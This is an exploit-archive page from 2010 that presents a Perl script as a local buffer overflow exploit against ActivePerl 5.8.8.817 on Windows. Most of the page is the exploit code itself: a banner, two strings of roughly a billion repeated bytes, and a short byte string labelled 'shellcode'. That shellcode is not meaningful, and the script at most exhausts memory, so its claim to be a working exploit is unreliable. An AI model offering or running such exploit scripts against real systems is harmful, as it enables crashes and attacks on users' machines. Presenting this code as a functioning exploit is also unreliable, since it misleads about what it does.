|
=====================================
ActivePerl v5.8.8.817 Buffer Overflow
=====================================
# Title:Local Buffer Overflow ActivePerl v5.8.8.817
# EDB-ID: ()
# CVE-ID: ()
# OSVDB-ID: ()
# Author: PoisonCode
# Published: 2010-06-09
# Download Exploit Code
# Download Vulnerable app
# Title:Local Buffer Overflow ActivePerl v5.8.8.817
# Software Link:http://www.activestate.com
# Version: v5.8.8.817
# Platform:Windows
# Author: PoisonCode
# CVE-ID:()
_____ _____ _ _
| __ \ / ____| (_) |
| |__) | (___ ___ ___ _ _ _ __ _| |_ _ _
| ___/ \___ \ / _ \/ __| | | | '__| | __| | | |
| | ____) | __/ (__| |_| | | | | |_| |_| |
|_| |_____/ \___|\___|\__,_|_| |_|\__|\__, |
__/ |
|___/
Exploit
-------------------------------------------
#!/usr/bin/perl
# File Name :Local Buffer Overflow ActivePerl
# Author :PoisonCode
# Exploit Title: Local Buffer Overflow ActivePerl
# Date:09/06/2010
# Author:PoisonCode
# Site :http://www.activestate.com
# Version: 5.8.8.817
# Tested on: Windows
$file="Exploit Perl Version 5.8.8.817";
print " ============================================\n";
print " = Local Buffer Overflow ActivePerl =\n";
print " = Version: 5.8.8.817 =\n";
print " = Autor:PoisonCode =\n";
print " = Web :PanamaSecurity.blogspot.com =\n";
print " =============================================\n";
print "\n";
print " Espere Mientras Trabaja el Exploit\n";
my $fruty="\x87" x 999999999;
my $loops="\x67" x 999999999;
my $shellcode="\x00\x13\xFF\xC4\x00\x10\x0a\xe4\x00\x08\x5b\x5d";
|